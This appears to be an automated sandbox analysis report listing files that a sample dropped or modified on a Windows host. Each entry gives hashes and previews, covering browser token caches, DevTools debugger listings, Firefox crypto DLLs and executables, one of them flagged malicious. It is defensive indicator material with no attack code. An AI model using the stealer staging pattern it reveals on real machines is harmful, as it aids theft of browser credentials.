Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f90513d9-d7ea-488a-b406-bfd9e513ddc5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44600
Entropy (8bit):	6.095524957781962
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMwuwhDO6vP6ONlNcNZE7AjcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEA6tluchu3VlXr4CRo1
MD5:	D72CBC9532A82803BE597CE6E18C265A
SHA1:	27B6907E87A1B6FDD8BB7720BB55626191A0817D
SHA-256:	783E5BB3C66C4EF32E0E967B3C23C538F8B6EBF407844A51F332C22E9B4094BB
SHA-512:	2D1B8292DD0A7A900B9ABB9B6F57B23CB0804743D188B4FE62ED780BC5054ECD60708A521BCE998DF3C4D43DB18C325F8F72956599D7DA99E6FFC5AD0CBF6C42
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fb4df0b7-d81d-482b-a62a-d4d1ca20b716.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44600
Entropy (8bit):	6.095524957781962
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMwuwhDO6vP6ONlNcNZE7AjcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEA6tluchu3VlXr4CRo1
MD5:	D72CBC9532A82803BE597CE6E18C265A
SHA1:	27B6907E87A1B6FDD8BB7720BB55626191A0817D
SHA-256:	783E5BB3C66C4EF32E0E967B3C23C538F8B6EBF407844A51F332C22E9B4094BB
SHA-512:	2D1B8292DD0A7A900B9ABB9B6F57B23CB0804743D188B4FE62ED780BC5054ECD60708A521BCE998DF3C4D43DB18C325F8F72956599D7DA99E6FFC5AD0CBF6C42
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8504454804255737
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxQxl9Il8ugM1k/uYXv6CekLYyWs3BiYd1rc:mdYv1cR/6CekLTZ3kv
MD5:	291AD0EDF996EE3B9CFCE5829670EA4A
SHA1:	017F536953E9803E6837601FCABAB458F54CBF22
SHA-256:	805509F0D63DEDF5D686C28B5548FE76BA8A4C4F5322579514518B7F74C8BCE3
SHA-512:	6D46E094F642B5C8213F04517236F50AF5A40164869ECF70573AB861F572AD62ED300C4F31BE139ABF60C07D230DAE5938F6284DE012B91C7593C9A72D7A8DE3
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.D.f.T.K.A.w.2.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.k.U.z.c.y.I.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	4.000429029472474
Encrypted:	false
SSDEEP:	96:N1YvCgaZ1yRflgEubv//V0+GZvUS8SuL9L9E:N1SaZ1yRfJubX/m+28SY9L9E
MD5:	6F93FDA69C11E0C2804E185B3DD2373F
SHA1:	ACB2871731E50D8561AF8AD22DCE0DF158FC2D4F
SHA-256:	79A148E8F8C2C8B9D3FD2FE3F1C70CDA9E94E1A487D66A2F9AD26D8F6E9FCAB1
SHA-512:	46254DF9275863AE9D9CF7B69EBCB6B6D4DC505614B73EDB92851B0D79E5B431915C73C48DE2307ED9E8ABB3CD6BFE93B8C9B81D9AEB72985C30E3BC01C17352
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".S.A.j.m.D.g.Q.2.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.k.U.z.c.y.I.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.90447794507801
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7x2xl9Il8ugMFClGtoTI4QVGa2F2zHlflXwZaRrH0BZad/vc:a8Yv4uVYYplXwAlGZ
MD5:	8D09E908179C91C7F03B4347F9F3823E
SHA1:	43E005FC562D5F40D2546B0C352607C4570D47C3
SHA-256:	69EA23DD32173084EEB2011AC9E22DFA2ECD5DADB744241BED8F600BB604E68D
SHA-512:	E8210B3724E46836E0409C5EFC6456F7F249389DF864CBFE142EFCB2E22F18A00A1B2A2052BE2FCB0213729C87B6A8363690EA3258630CC8D651220F3EB4E74F
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.S.8.l.P.9.V.U.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.k.U.z.c.y.I.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.39272965466785
Encrypted:	false
SSDEEP:	96:6NnQQcWHQQjNnQe0+bQe9NnQg9QFNnQhdgEQ4NnQcQXNnQqM+DQqFNnQCOQwQCjt:6N5c0jNB0e9NQN4tNkNlM+hFNPOQGjN/
MD5:	D5EDEE9E5E48890F41D065C2B396ADC4
SHA1:	4AD87000A54AF8DE07B7DFCD459D84DEE6A3DF0F
SHA-256:	6233B2A0D610371A177B114A5CF4DDB9136D5137DEC37D5B7E58015F522C5568
SHA-512:	D02A043B905BC098369666377058064BC6FB765A52F9FD1695B671CC4E417D370150B87D2F699DA689D5E2BEE989FC6A1975398C0B4E55CC9247B54BAFA71818
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/C181C90ACC97522EC0805CFCE2877424",.. "id": "C181C90ACC97522EC0805CFCE2877424",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/C181C90ACC97522EC0805CFCE2877424"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/D05163FB8C52E1D916E477267F5C3999",.. "id": "D05163FB8C52E1D916E477267F5C3999",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/D05163FB8C52E1D916E477267F5C3999"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.356754149508421
Encrypted:	false
SSDEEP:	48:SfNaoQZTEQpFfNaoQAQYfNaoQhI4QWfNaoQ1C0UrU0U8Q4:6NnQZTEQpxNnQAQkNnQhI4Q+NnQ1C0U7
MD5:	8A23698E5F103ADC327CA7C510F0B1D3
SHA1:	54DB77A7263E99EA0A193FDDB5123CF612EBA986
SHA-256:	5F0DD3F4EB06591B8BB88999E9FB4CCD258B7B66E8CE6ACC8310CD6AA5CA9DCF
SHA-512:	051866EA104BDCD8CE6C47D469DB16402EF89F33A8D7185EA1A9C4BEFD6EF059F47BCFD95910DCA52A9E27669D2314720299DF37F22736E329EB164BA2826FBC
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/36829C519197FD23035DF1F1A2140A0A",.. "id": "36829C519197FD23035DF1F1A2140A0A",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/36829C519197FD23035DF1F1A2140A0A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/924C3C4A112F4F10B044441A676E6B72",.. "id": "924C3C4A112F4F10B044441A676E6B72",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/924C3C4A112F4F10B044441A676E6B72"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mk[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	9308672
Entropy (8bit):	6.823957267105585
Encrypted:	false
SSDEEP:	98304:Owxu5dEZsuQ3kG3kcE7p2XQ/t9MzfT/ZJ9dQap5XBQ:OwxKENQ3kG3k7H/vMzfP9dQQ
MD5:	B56761AD16C0E1CDD4765A130123DBC2
SHA1:	FC50B4FD56335D85BBAAF2D6F998AAD037428009
SHA-256:	095A2046D9A3AEEEFC290DC43793F58BA6AB884A30D1743D04C9B5423234CCDD
SHA-512:	26C82DA68D7EEF66C15E8AE0663D29C81B00691580718C63CDB05097AE953CBE0E6AC35B654E883DB735808640BC82141DA54C8773AF627A5EAEA70B0ACF77ED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....4g..........".......D..RI.......D.......@.............................. .......................@............... ................L.......K..I....S...;...O..............0L..Y........................... L.(....................K.(.....K.<....................text...`.D.......D................. ..`.data.........D.......D.............@....bss.........J..........................idata...I....K..J....J.............@....didata.<.....K.......K.............@....edata........L......(K.............@..@.tls....p.....L..........................rdata..m.... L......*K.............@..@.reloc...Y...0L..Z...,K.............@..B.pdata........O.......N.............@..@.rsrc.....;...S...;..~R.............@..@............. ......................@..@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2811904
Entropy (8bit):	6.48165561953676
Encrypted:	false
SSDEEP:	49152:4g9pZRGteDLtFJ8R1X5EHEDnX2htiTQr:48pZktiLWRMkDXdQr
MD5:	39307DB79B786D76D1B6070FEC77BC0B
SHA1:	54546D19873479CFF3FC1BA00A77C9433612C8D6
SHA-256:	C6051A76F472B570BF9EB2A80FAA638D370E415F0C7904BA4C4C044D673DB69B
SHA-512:	0DA1EEE41B9DD08C85F8809427E30BFF86DA2F811F5BE29D0AEFB951B377408B0A4899B25EFD6D9F24D3C69BE193A8ADC465D18590D6F81A8DF865FC68A75125
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`+.. ...`....@.. ........................+.....jw+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...ckqtwfzn...........:..............@...wmhyjqub. ...@+....................@....taggant.@...`+..".................@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
